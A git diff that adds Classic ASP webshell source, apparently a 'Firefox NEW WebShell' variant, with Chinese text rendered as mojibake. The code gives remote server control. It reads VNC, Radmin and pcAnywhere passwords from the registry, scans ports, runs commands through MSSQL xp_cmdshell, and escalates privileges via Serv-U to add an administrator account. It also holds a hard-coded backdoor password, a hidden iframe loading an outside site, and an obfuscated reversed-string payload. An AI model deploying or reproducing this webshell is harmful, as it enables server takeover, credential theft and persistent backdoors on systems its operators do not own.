+j "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"
+exit function
+end if
+end if
+Path = GetFullPath(Path)
+re = CheckDirIsOKWrite(Path)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+end if
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+for each file in f.Files
+Re = CheckFileWrite(Path&file.name)
+if Re =0 then
+j "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+b =true
+else
+if ShowNoWriteDir then j "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+next
+if b then response.Flush 
+end if
+for each file in f.SubFolders
+if CheckNextDir=false then
+re = CheckDirIsOKWrite(Path&file.name)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+end if
+end if
+if (CheckNextDir=True) and (IS_TEMP_DIR=false) then 
+ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir 
+end if
+next
+Set FSO = Nothing
+set f = Nothing
+end function
+function goback()
+set Ofso = Server.CreateObject(CONST_FSO)
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+j "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+j "<script>ShowFolder("""&Session("FolderPath")&""")</script><center>�Ѿ��Ǵ��̸�Ŀ¼��!</center><center><br><INPUT type=button value=���� onClick='history.go(-1);'></br></center>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+sub ReadREG()
+j "<form method=post>"
+j  "ע�����ֵ��ȡ<p>" 
+j "<input type=hidden value=ReadReg name=theAct>"
+j "<tr><td colspan=2> "
+j "<select onChange='this.form.thePath.value=this.value;'>"
+j "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+j "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+j"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+j"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+j"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+j"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+j"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+j"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+j"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+j"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+j"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+j"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+j "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+j "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+j "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+j "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+j "</select><br />"
+j " <input name=thePath value='' size=80>"
+j "<input type=button value='�� �� ֵ' onclick='this.form.submit()'>"
+j "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+j "<li>" & theArray(i)
+Next
+Else
+j "<li>" & theArray
+End If
+end if
+end sub
+sub delpoint()
+if Request("delpfloder") <>"" then
+delpointfolder "\\?\"&Request("delpfloder")
+end if
+if Request("delpfile") <>"" then
+delpointfile "\\?\"&Request("delpfile")
+end if
+j "<font color =red>����ʾ����д<font>"
+j "<br><br><form action=''method='post'><input name='delpfloder' type='text' size='85' value='D:\freehost\dot..'><input type='submit' name='Submit' value='ɾ������Ŀ¼'></form><p><form action='' method='post'><input name='delpfile'type='text'  size='85'value ='D:\freehost\dot..\file.asp'><input type='submit' name='Submit' value='ɾ�������ļ�'></form></div>"
+end  sub
+function Delpointfolder(t0)
+Set fso=Server.CreateObject(CONST_FSO)
+If Instr(t0,":\")>0 Then
+  f0=t0
+Else
+  f0=Server.MapPath(t0)
+End If
+fso.DeleteFolder f0,true   
+     j  t0&"ɾ���ɹ�!!<br>"
+IF Err Then j Err.Description:Err.Clear
+End Function
+function Delpointfile(t0)
+ Set fso=Server.CreateObject(CONST_FSO)
+If Instr(t0,":\")>0 Then
+ f0=t0
+ Else
+  f0=Server.MapPath(t0)
+ End If
+ fso.DeleteFile f0,true 
+ IF Err Then j Err.Description:Err.Clear
+j  t0&"ɾ���ɹ�!!<br>"
+End function
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject(CONST_FSO)
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+if request("profile")="a" then j c
+response.end
+end if
+
+if sessIoN("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("KKK")=userPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><font size='5' color='red'>PassWord Error!</font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+si="<body style=""background:url("&bg&") no-repeat center center;""> <center><FONT style=""FONT-SIZE: 80pt; FILTER: shadow(color:#696969,strength=55); WIDTH: 100%;  LINE-HEIGHT: 300%; FONT-FAMILY:Arial"">"&Copyright&"</FONT><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><b>PassWord��</b><input name='pass' type='password' size='22'> <input type='submit' value='submit'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="21,23,53,1433,3306,3389,4899,5631,5632,5800,5900,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+j"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD��CMD������ɨ�費׼ȷ��)</p><p>�������������ɨ�����ⲿIP�����޷����ӡ�����SHELL��ִ��ϵ�в�����</p>"
+j"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+j"<p>Scan IP: "
+j" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+j"<br>Port List:"
+j"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+j"<br><br>"
+j"<input name='submit' type='submit' class='buttom' value=' scan '>"
+j"<input name='scan' type='hidden' id='scan' value='111'>"
+j"</p></form>"
+If request.Form("scan") <> "" Then
+timer1 = timer
+j("<b>ɨ�豨��:</b><br><hr>")
+tmp = Split(request.Form("port"),",")
+ip = Split(request.Form("ip"),",")
+For hu = 0 to Ubound(ip)
+If InStr(ip(hu),"-") = 0 Then
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ip(hu), tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ip(hu), j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Else
+ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
+For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
+For i = 0 To Ubound(tmp)
+If Isnumeric(tmp(i)) Then 
+Call Scan(ipStart & xxx, tmp(i))
+Else
+seekx = InStr(tmp(i), "-")
+If seekx > 0 Then
+startN = Left(tmp(i), seekx - 1 )
+endN = Right(tmp(i), Len(tmp(i)) - seekx )
+If Isnumeric(startN) and Isnumeric(endN) Then
+For j = startN To endN
+Call Scan(ipStart & xxx,j)
+Next
+Else
+j(startN & " or " & endN & " is not number<br>")
+End If
+Else
+j(tmp(i) & " is not number<br>")
+End If
+End If
+Next
+Next
+End If
+Next
+timer2 = timer
+thetime=cstr(int(timer2-timer1))
+j"<hr>Process in "&thetime&" s"
+END IF
+end sub
+Sub Scan(targetip, portNum)
+On Error Resume Next
+set conn = Server.CreateObject("ADODB.connection")
+connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+conn.ConnectionTimeout = 1
+conn.open connstr
+If Err Then
+If Err.number = -2147217843 or Err.number = -2147467259 Then
+If InStr(Err.description, "(Connect()).") > 0 Then
+j(targetip & ":" & portNum & ".........�ر�<br>")
+Else
+j(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+End If
+End If
+End If
+End Sub
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://webshell.org/web/where/ip.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject(CONST_FSO)
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"delpoint":call delpoint()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+Case "CustomScanDriveForm":CustomScanDriveForm()
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body><iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe></html>" 
+%>
\ No newline at end of file
diff --git a/www-7jyewu-cn/火狐NEW WebShell (1).asp b/www-7jyewu-cn/火狐NEW WebShell (1).asp
new file mode 100644
index 0000000..f5f2d48
--- /dev/null
+++ b/www-7jyewu-cn/火狐NEW WebShell (1).asp	
@@ -0,0 +1,1454 @@
+<%
+UserPass="admin"     '��½����
+loginad="�ձ����빷�������ڣ� "'������֤������ʾ������
+mName="���NEW WebShell"           '��������
+SiteURL="http://www.7jyewu.cn/"            '��վ
+Copyright="�������ڷǷ���;�����������߸Ų�����"       '��Ȩ
+AD="���"   '�������
+'------------------------------------------------------------
+
+'  �������ظ���ţ����ɱ�����𣿡�   http://www.7jyewu.cn/
+
+'-------------------------------------------------------------
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+sub ShowErr()
+  If Err Then
+    RRS"<br><a href='javascript:history.back()'><br>&nbsp;" & Err.Description & "</a><br>"
+    Err.Clear:Response.Flush
+  End If
+end sub
+Sub RRS(str)
+	response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+serveru=request.servervariables("http_host")&url
+serverp=userpass
+uu=serveru
+FolderPath=Request("FolderPath")
+FName=Request("FName")
+BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>":
+dim ShiSan,ShiSanNewstr,ShiSanI
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf & ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+uu=serveru
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mName&" - "&ServerIP&" </title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:#000000;color:#00ff00;}"
+RRS"input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}"
+RRS".C{background-color:#000000;border:0px}"
+RRS".cmd{background-color:#000;color:#FFF}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: #00fcfc;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
+RRS".am{color:#888;font-size:11px;}"
+RRS"</style>"
+ShiSan="���>tpircs/<��SRR���};eurt nruter;)(timbus.mroFbD;�����=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)���!ȷ�����Ǿ���LQS�������(trela{)01<htgnel.rts(fi};eslaf nruter;)���!ȷ�����Ǵ�����������������(trela{)5<htgnel.eulav.rtSbD.mroFbD(fi{)gp,rts(rtSlqSlluF noitcnuf��SRR���};eurt nruter};]i[rtS = eulav.rtSlqS.mroFbD{esle};)]i[rtS(trela{)21==i(fi esle};���>retnec/<��������������LQS�����ٿ������������ȷ��>retnec<���=LMTHrenni.cba;����� = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=<i(fi;��塣���ָ�ʮ��ǰ�Ķ���ʾ��ֻ������һ����n\.��ʵѯ���ƿؼ����ÿɣ����ֲ�ȫ�Ķ���ʾ�Կɼ�ʱ������һʾ��ֻ����� =]21[rtS;���SSAP NMULOC PORD ]emaNelbaT[ ELBAT RETLA��� =]11[rtS;���)23(RAHCRAV SSAP NMULOC DDA ]emaNelbaT[ ELBAT RETLA��� =]01[rtS;���]emaNelbaT[ ELBAT PORD��� = ]9[rtS;���))05(RAHCRAV RESU,LLUN TON )1,1( YTITNEDI TNI DI(]emaNelbaT[ ELBAT ETAERC��� = ]8[rtS;���001=DI EREHW '\emanresu'\=RESU TES ]emaNelbaT[ ETADPU��� = ]7[rtS;���001=DI EREHW ]emaNelbaT[ MORF ETELED��� = ]6[rtS;���)'\drowssap'\,'\emanresu'\(SEULAV )SSAP,RESU(]emaNelbaT[ OTNI TRESNI��� = ]5[rtS;���001<DI EREHW ]emaNelbaT[ MORF * TCELES��� = ]4[rtS;���emaNnsD=nsD��� = 